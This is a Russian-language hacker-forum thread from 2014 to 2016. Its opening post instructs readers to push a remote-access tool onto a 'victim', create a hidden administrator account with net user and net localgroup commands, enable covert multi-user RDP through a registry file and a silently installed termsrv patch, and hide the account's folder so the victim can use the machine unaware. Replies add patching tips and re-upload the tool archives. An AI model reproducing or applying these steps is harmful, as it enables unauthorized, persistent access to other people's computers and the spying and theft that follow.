1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Мультиюзерный RDP через RMS. Управляем одной машиной одновременно с жертвой.

Тема в разделе "Наши статьи", создана пользователем Contra017, 6 май 2014.

  1. Contra017
    Contra017 Новичок
    Симпатии:
    3
    Мультиюзерный RDP через RMS. Управляем одновременно с жертвой одной машиной с двух разных учеток. Инструкция.

    Нам понадобиться:
    1) Патчи UniversalTermsrvPatch-x86 и UniversalTermsrvPatch-x64
    2) *.reg файл включающий мультиюзерность и скрывающий нашу учетную запись из Winlogon (окна приветствия)
    3) Скрипт для скрытой, автоматической установки патча UniversalTermsrvPatch-x86 или UniversalTermsrvPatch-x64

    Все это можно взять здесь http://gfile.ru/a6BVA пароль xaker.name Нужные файлы упорядочены по версиям Windows. Патчи качались с официального сайта, скрипт написан в Autoit скомпилирован в .exe

    Инструкция:
    1) Впариваете жертве RMS
    2) Конектитесь. В зависимости от версии и разрядности операционной системы выбираете из архива нужную версию UniversalTermsrvPatch и файлов multi.reg, script.exe. Копируете их к жертве в папку windows\system32
    3) В терминале создаете свою учетную запись командой:

    net user user 12345 /add

    создаст нам пользователя с именем user и паролем 12345

    net localgroup Администраторы user /add

    добавит пользователя user в групу Администраторы

    regedit /s multi.reg

    скрыто внесет нужные изменения в реестр, включит мультиюзерность и скроет нашу запись из окна приветсвтия (что бы жертва не спалила вашу учетку)

    Дальше в терминале выбираем удаленный запуск открывается файловый менеджер. Выбираем скопированый раньше файл script.exe ставим галoчку запустить от имени системы и жмем ОК.

    Жертва патчиться и автоматически перезагружается.

    Ожидаем.

    Как только жертва появилась в сети выбираем режим RDP, вводим имя пользователя и пароль, во всех появляющихся окнах жмем Да или Ок.

    После того как вы вошли в "свою" учетку набераете в терминале комманду

    attrib +h +s "C:\Documents and Settings\user" для Windows XP
    attrib +h +s "C:\Users\user" для Windows 7

    это скроет папку вашей учетной записи.

    Удаленный рабочий стол готов. Удачной охоты.
     
    6 май 2014
    3 пользователям это понравилось.
  2. GeForse
    GeForse Новичок
    Симпатии:
    4
    Ооо...отличная статья;) спасибо за развернутую информацию:thx:
     
    6 май 2014
  3. andersen62
    andersen62 Новичок
    Симпатии:
    7
    если машина под доменном... ммммм )))))
     
    8 май 2014
  4. lebidon
    lebidon Новичок
    Симпатии:
    1
    Перезалейте архив, нехера не могу скачать с http://gfile.ru/a6BVA
     
    12 май 2014
  5. ww2
    ww2 Продвинутый
    Симпатии:
    24
    12 май 2014
  6. nightop
    nightop Новичок
    Симпатии:
    6
    попробовал проделать на виртуалке в win7 32bit (начальная версия , незарегистрированная)
    все вроде сделал, пропатчилось и перезагрузилось.
    далее пытаюсь войи по рдп, висит окошко подключения и ничего далее не происходит.
    Закрываю и захожу на виртуалку, смотрю в диспетчере появилась вкладка с пользователями, значит терминальный сервер готов
    Так же проверил что пользователь user заведен в систему.
    Так что я делаю не так? хелп плиз :)
     
    19 июл 2014
  7. ww2
    ww2 Продвинутый
    Симпатии:
    24
    Этот патч не на всех ОС работает, в основном на xp x32 грузит норм все
    на забугорных форумах есть патчи, они в основном отличаются разрядностью x32 и x64 и если Win7 то отличаются с SP1 и без SP1 в них разные библиотеки идут termsrv.dll и если версия не совпадает то подключения не будет
    Вот для Win7 SP1 всех разрядов: RDP
    1. Копируем жертве
    2. Запускать install.cmd multi
    после install.cmd параметр multi обязателен
    После патчинга перезагружаем ПК жертвы и можно прям в её учётку заходить в одной учётке вдвоём)
     
    19 июл 2014
  8. nightop
    nightop Новичок
    Симпатии:
    6
    ого, даже так)) надо бы все патчи отыскать и под win8 ))
     
    19 июл 2014
  9. ww2
    ww2 Продвинутый
    Симпатии:
    24
    Можно не искать, найди в гайд в гугле как то натыкался на него там описано как редактировать вручную файлик termsrv.dll если найдёшь то там через hex редактор просто несколько символов сменить и гуд, и так от каждой ос с файликом проделать и норм, потом просто в будущем у жертвы подменять файлик)
    У меня были файлики выложил бы но потерял их где то(
     
    19 июл 2014
  10. nightop
    nightop Новичок
    Симпатии:
    6
    спасибо за помощь,
    вобщем тут можно посмотреть на что именно менять для каждой систему,
    зависит не только от разрядности. системы, но и от версии (стартер, проф, ультимейт)
     
    Последнее редактирование: 19 июл 2014
    19 июл 2014
  11. Aini
    Aini Новичок
    Симпатии:
    0
    Данная темка оооочень интересна, но абсолютно все ссылки в теме битые.

    Перезалейте плз у кого сохранились патчи.
     
    3 сен 2014
  12. ww2
    ww2 Продвинутый
    Симпатии:
    24
    RDP Download

    Перезалил, остался архив)
    Скачать с SendSpace
    Скачать с RGhost.ru

    Пароль: xaker.name
     
    Последнее редактирование: 3 сен 2014
    3 сен 2014
  13. Aini
    Aini Новичок
    Симпатии:
    0
    Благодарствую.

    Не совсем то, что я ждал конечно. Я ждал то, к чему даны пояснения постами выше.

    Если дашь описание к этой делюге, будет совсем супер.
     
    3 сен 2014
  14. AHTOLLlKA
    AHTOLLlKA Новичок
    Симпатии:
    0
    если у кого остались файлы - перезалейте пожалуйста
     
    7 июн 2015
  15. Lilu
    Lilu Новичок
    Симпатии:
    0
    Что-то самые интересные темы мертвые. Депрессия на сайте?
     
    12 июн 2015
  16. fernando
    fernando Новичок
    Симпатии:
    0
    она тут с самого 2013 :(
     
    12 июн 2015
  17. IIIBot
    IIIBot Новичок
    Симпатии:
    0
    Есть у кого файлы? Перезалейте.
     
    10 дек 2015
  18. SilverVG
    SilverVG Новичок
    Симпатии:
    0
    А как самому то определить что у вас на терминале включили такую бяку?
     
    11 дек 2015
  19. Maximys
    Maximys Новичок
    Симпатии:
    2
    @IIIBot, поддерживаю
    перезалейте файло плз
     
    11 дек 2015
  20. hover
    hover Новичок
    Симпатии:
    0
    срочно перезалейте
     
    9 мар 2016

Поделиться этой страницей

Загрузка...